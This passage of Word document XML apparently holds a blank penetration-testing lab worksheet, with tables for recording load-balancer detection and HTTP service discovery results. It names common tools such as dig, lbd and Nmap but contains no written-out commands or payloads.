            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20EE903B" w14:textId="77777777" w:rsidR="007A0A6C" w:rsidRDefault="007A0A6C" w:rsidP="00BA7B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04BEC40" w14:textId="77777777" w:rsidR="007A0A6C" w:rsidRDefault="007A0A6C" w:rsidP="00BA7B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FA84D23" w14:textId="77777777" w:rsidR="007A0A6C" w:rsidRDefault="007A0A6C" w:rsidP="00BA7B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EF7899F" w14:textId="77777777" w:rsidR="007A0A6C" w:rsidRDefault="007A0A6C" w:rsidP="00BA7B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33F0B35" w14:textId="77777777" w:rsidR="007A0A6C" w:rsidRDefault="007A0A6C" w:rsidP="00BA7B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</w:tbl>
    <w:p w14:paraId="7CAF7B72" w14:textId="77777777" w:rsidR="00172EF0" w:rsidRDefault="00172EF0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4546C6" w:rsidRPr="000F3EF2" w14:paraId="400A4307" w14:textId="77777777" w:rsidTr="00D85674">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="19E6A30F" w14:textId="59D94378" w:rsidR="004546C6" w:rsidRPr="000F3EF2" w:rsidRDefault="004546C6" w:rsidP="008519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1.14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830927" w:rsidRPr="00830927">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test whether the Target Website is Protected using Load Balancers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13C307F7" w14:textId="77777777" w:rsidR="00587A79" w:rsidRPr="002A470D" w:rsidRDefault="00587A79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98"/>
        <w:gridCol w:w="6862"/>
      </w:tblGrid>
      <w:tr w:rsidR="005727AB" w:rsidRPr="00B843A4" w14:paraId="1F7BC776" w14:textId="77777777" w:rsidTr="007447F9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7BD6EA4F" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="007447F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Target </w:t>
            </w:r>
            <w:r w:rsidRPr="00B843A4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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EE7D8F9" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="3128958C" w14:textId="77777777" w:rsidTr="007447F9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6A9FCF35" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="007447F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843A4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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FDD2030" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="54DA3142" w14:textId="77777777" w:rsidTr="007447F9">
        <w:trPr>
          <w:trHeight w:val="1286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7CFDF9F7" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="007447F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843A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366B7E54" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="29A31597" w14:textId="77777777" w:rsidTr="007447F9">
        <w:trPr>
          <w:trHeight w:val="854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51A09B86" w14:textId="57F9E6D3" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="003773B3" w:rsidP="007447F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773B3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Method Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="197B48C3" w14:textId="7AAACF59" w:rsidR="005727AB" w:rsidRPr="00F10796" w:rsidRDefault="005727A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1079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3773B3" w:rsidRPr="003773B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host, dig, lbd, Nmap, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F1079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9D0DAC" w:rsidRPr="00B843A4" w14:paraId="1574BE7B" w14:textId="77777777" w:rsidTr="007447F9">
        <w:trPr>
          <w:trHeight w:val="854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78234C33" w14:textId="69EAC191" w:rsidR="009D0DAC" w:rsidRPr="003773B3" w:rsidRDefault="009D0DAC" w:rsidP="007447F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D0DAC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Multiple IPs Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2F2A3F" w14:textId="2CF3C8B4" w:rsidR="009D0DAC" w:rsidRPr="00F10796" w:rsidRDefault="009D0DAC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F36439" w:rsidRPr="00F3643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List of IPs if found</w:t>
            </w:r>
            <w:r w:rsidR="00F3643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5727AB" w:rsidRPr="00B843A4" w14:paraId="51103CC7" w14:textId="77777777" w:rsidTr="007447F9">
        <w:trPr>
          <w:trHeight w:val="854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708016E5" w14:textId="6D85C558" w:rsidR="005727AB" w:rsidRPr="00F10796" w:rsidRDefault="00A94B66" w:rsidP="007447F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94B66">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server &amp; Date Headers Indicating Load Balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFB559C" w14:textId="48E6C14C" w:rsidR="005727AB" w:rsidRPr="00F10796" w:rsidRDefault="005727A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A94B66" w:rsidRPr="00A94B6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Details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5727AB" w:rsidRPr="00B843A4" w14:paraId="1085FC4C" w14:textId="77777777" w:rsidTr="007447F9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18960411" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="007447F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843A4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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E26B021" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="00843567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D3FC56B" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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2857522" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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4EB7C54" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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90DA0B2" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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ADAA202" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="60C1AADF" w14:textId="77777777" w:rsidTr="005675AE">
        <w:trPr>
          <w:trHeight w:val="1457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7F2CB3B7" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727AB" w:rsidP="007447F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A7B6B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used for Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F777F3" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00B843A4" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="6DFB454E" w14:textId="77777777" w:rsidTr="007447F9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5D69D363" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00927FF7" w:rsidRDefault="005727AB" w:rsidP="007447F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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FDF60A8" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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78BED89" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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E249F2C" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00927FF7" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="00DDC813" w14:textId="77777777" w:rsidTr="007447F9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5B9EB7DF" w14:textId="1C3AE594" w:rsidR="005727AB" w:rsidRPr="004B6A7F" w:rsidRDefault="0033422B" w:rsidP="007447F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3422B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Extracted Load Balancer Information &amp; IP List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7300CDA2" w14:textId="77777777" w:rsidR="005727AB" w:rsidRPr="00927FF7" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="6A8685AE" w14:textId="77777777" w:rsidTr="007447F9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6B3CBF17" w14:textId="733DD3C6" w:rsidR="005727AB" w:rsidRPr="007D19F7" w:rsidRDefault="005727AB" w:rsidP="007447F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F67D1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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147BC022" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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727AB" w:rsidRPr="00B843A4" w14:paraId="7ADA87F0" w14:textId="77777777" w:rsidTr="007447F9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7351EF4A" w14:textId="712D55B4" w:rsidR="005727AB" w:rsidRPr="004F67D1" w:rsidRDefault="005727AB" w:rsidP="007447F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b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2955E61E" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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F69C6AB" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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7F769AE" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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99E3710" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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5B34E94" w14:textId="77777777" w:rsidR="005727AB" w:rsidRDefault="005727A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</w:tbl>
    <w:p w14:paraId="7976DEEC" w14:textId="77777777" w:rsidR="00830927" w:rsidRDefault="00830927" w:rsidP="000947B4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0A4B71" w:rsidRPr="000F3EF2" w14:paraId="550A6908" w14:textId="77777777" w:rsidTr="00D85674">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="52850B2C" w14:textId="19BE59F6" w:rsidR="000A4B71" w:rsidRPr="000F3EF2" w:rsidRDefault="000A4B71" w:rsidP="008519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1.15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7F4858" w:rsidRPr="007F4858">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Perform HTTP Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C0C3EFA" w14:textId="77777777" w:rsidR="00D36C8A" w:rsidRPr="00651841" w:rsidRDefault="00D36C8A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98"/>
        <w:gridCol w:w="6862"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w14:paraId="26F1E27C" w14:textId="77777777" w:rsidTr="0072674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33F64563" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="007267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Target </w:t>
            </w:r>
            <w:r w:rsidRPr="00B843A4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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D0B664" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="58BFA896" w14:textId="77777777" w:rsidTr="0072674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288A85D1" w14:textId="5C19A6D8" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="007267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843A4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Target Web </w:t>
            </w:r>
            <w:r w:rsidR="00ED1FC7">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="653C6370" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="370CABFE" w14:textId="77777777" w:rsidTr="00726743">
        <w:trPr>
          <w:trHeight w:val="1286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4BB367B8" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="007267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843A4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C9EE6E5" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="7DB4958C" w14:textId="77777777" w:rsidTr="003D397A">
        <w:trPr>
          <w:trHeight w:val="1493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7C2F1014" w14:textId="737F70E1" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00ED1FC7" w:rsidP="007267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D1FC7">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Open HTTP Service Ports Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3488C32E" w14:textId="7B1A5E92" w:rsidR="00B26BFB" w:rsidRPr="00F10796" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="3EC70F19" w14:textId="77777777" w:rsidTr="003D397A">
        <w:trPr>
          <w:trHeight w:val="2060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13DA13E6" w14:textId="1A2799DB" w:rsidR="00B26BFB" w:rsidRPr="003773B3" w:rsidRDefault="00A33027" w:rsidP="007267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33027">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Detected Services &amp; Versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D79774" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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842DABF" w14:textId="77777777" w:rsidR="00E86D2A" w:rsidRDefault="00E86D2A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03A11BB" w14:textId="7C461FCD" w:rsidR="00E86D2A" w:rsidRPr="00F10796" w:rsidRDefault="00E86D2A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1A232B" w:rsidRPr="00B843A4" w14:paraId="503CFFE8" w14:textId="77777777" w:rsidTr="003D397A">
        <w:trPr>
          <w:trHeight w:val="2060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1A004328" w14:textId="6722F782" w:rsidR="001A232B" w:rsidRPr="00A33027" w:rsidRDefault="001A232B" w:rsidP="007267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A232B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Alternate Web Services Discovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13DE3A1F" w14:textId="77777777" w:rsidR="001A232B" w:rsidRDefault="001A232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A94B6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Details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66028F9" w14:textId="77777777" w:rsidR="00E86D2A" w:rsidRDefault="00E86D2A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90D1752" w14:textId="77777777" w:rsidR="00E86D2A" w:rsidRDefault="00E86D2A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B8CE5BD" w14:textId="77777777" w:rsidR="00E86D2A" w:rsidRDefault="00E86D2A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71D0B08" w14:textId="03B781A4" w:rsidR="00E86D2A" w:rsidRPr="00F10796" w:rsidRDefault="00E86D2A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26BFB" w:rsidRPr="00B843A4" w14:paraId="477AE1C1" w14:textId="77777777" w:rsidTr="003D397A">
        <w:trPr>
          <w:trHeight w:val="2033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759AF597" w14:textId="2605568C" w:rsidR="00B26BFB" w:rsidRPr="00F10796" w:rsidRDefault="00A33027" w:rsidP="007267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Other Information Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D83D42D" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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81AB47D" w14:textId="77777777" w:rsidR="00E86D2A" w:rsidRDefault="00E86D2A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D2120BB" w14:textId="77777777" w:rsidR="00E86D2A" w:rsidRDefault="00E86D2A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4CC94F2" w14:textId="58DBCF96" w:rsidR="00E86D2A" w:rsidRPr="00F10796" w:rsidRDefault="00E86D2A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26BFB" w:rsidRPr="00B843A4" w14:paraId="6BE696CD" w14:textId="77777777" w:rsidTr="0072674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50337AC9" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="007267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843A4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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61FA4A68" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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A056C5E" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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D1B4444" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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A16B0AE" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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384E419" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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C2F413C" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="115E0102" w14:textId="77777777" w:rsidTr="005E4027">
        <w:trPr>
          <w:trHeight w:val="1727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083427FE" w14:textId="69147583" w:rsidR="00B26BFB" w:rsidRPr="00B843A4" w:rsidRDefault="00B26BFB" w:rsidP="007267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bookmarkStart w:id="2" w:name="_Hlk189059843"/>
            <w:r w:rsidRPr="00BA7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312FCCFC" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="002C030C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C030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[*ShellGPT, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5A8EE0" w14:textId="77777777" w:rsidR="002C030C" w:rsidRDefault="002C030C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3EEF5F1" w14:textId="6984D9B3" w:rsidR="002C030C" w:rsidRPr="002C030C" w:rsidRDefault="002C030C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26BFB" w:rsidRPr="00B843A4" w14:paraId="31AC67F9" w14:textId="77777777" w:rsidTr="005E4027">
        <w:trPr>
          <w:trHeight w:val="1880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5E597720" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00927FF7" w:rsidRDefault="00B26BFB" w:rsidP="007267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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="293BF8D1" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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CC53CDE" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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5BD13C6" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="00927FF7" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="12D03679" w14:textId="77777777" w:rsidTr="005E4027">
        <w:trPr>
          <w:trHeight w:val="1790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3E1D9B84" w14:textId="365BFD6E" w:rsidR="00B26BFB" w:rsidRPr="004B6A7F" w:rsidRDefault="00B26BFB" w:rsidP="007267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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A951EF8" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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F0B7E62" w14:textId="77777777" w:rsidR="009F63C0" w:rsidRDefault="009F63C0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0E3EB8D" w14:textId="77777777" w:rsidR="009F63C0" w:rsidRPr="00927FF7" w:rsidRDefault="009F63C0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bookmarkEnd w:id="2"/>
      <w:tr w:rsidR="009F63C0" w:rsidRPr="00B843A4" w14:paraId="0E9AA2CB" w14:textId="77777777" w:rsidTr="0072674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305F1327" w14:textId="6D8E92EC" w:rsidR="009F63C0" w:rsidRPr="0033422B" w:rsidRDefault="009F63C0" w:rsidP="007267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F63C0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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E431161" w14:textId="77777777" w:rsidR="009F63C0" w:rsidRDefault="009F63C0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[If any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193AC8D4" w14:textId="77777777" w:rsidR="009F63C0" w:rsidRDefault="009F63C0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A6E9017" w14:textId="786B143F" w:rsidR="009F63C0" w:rsidRPr="00927FF7" w:rsidRDefault="009F63C0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26BFB" w:rsidRPr="00B843A4" w14:paraId="4E3AA97D" w14:textId="77777777" w:rsidTr="0072674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5332995F" w14:textId="45AAD388" w:rsidR="00B26BFB" w:rsidRPr="007D19F7" w:rsidRDefault="00B26BFB" w:rsidP="007267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F67D1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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5732AD99" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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26BFB" w:rsidRPr="00B843A4" w14:paraId="3ACB39C3" w14:textId="77777777" w:rsidTr="0072674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3B84F142" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BFB" w:rsidP="007267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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76284A70" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRPr="004F67D1" w:rsidRDefault="00B26BFB" w:rsidP="007267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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02BCA640" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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A428699" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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532488C" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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515C65F" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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F682E75" w14:textId="77777777" w:rsidR="00B26BFB" w:rsidRDefault="00B26BF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</w:tbl>
    <w:p w14:paraId="06C83936" w14:textId="224EB2BF" w:rsidR="00627A0D" w:rsidRDefault="00627A0D" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402C0B2D" w14:textId="77777777" w:rsidR="00627A0D" w:rsidRDefault="00627A0D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w: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FC0929" w:rsidRPr="000F3EF2" w14:paraId="68A60EDD" w14:textId="77777777" w:rsidTr="00D85674">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1DB29FB8" w14:textId="06A1F620" w:rsidR="00FC0929" w:rsidRPr="000F3EF2" w:rsidRDefault="00FC0929" w:rsidP="008519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1.1</w:t>
            </w:r>
            <w:r w:rsidR="00C22BA9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>6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C22BA9" w:rsidRPr="00C22BA9">
              <w:rPr>
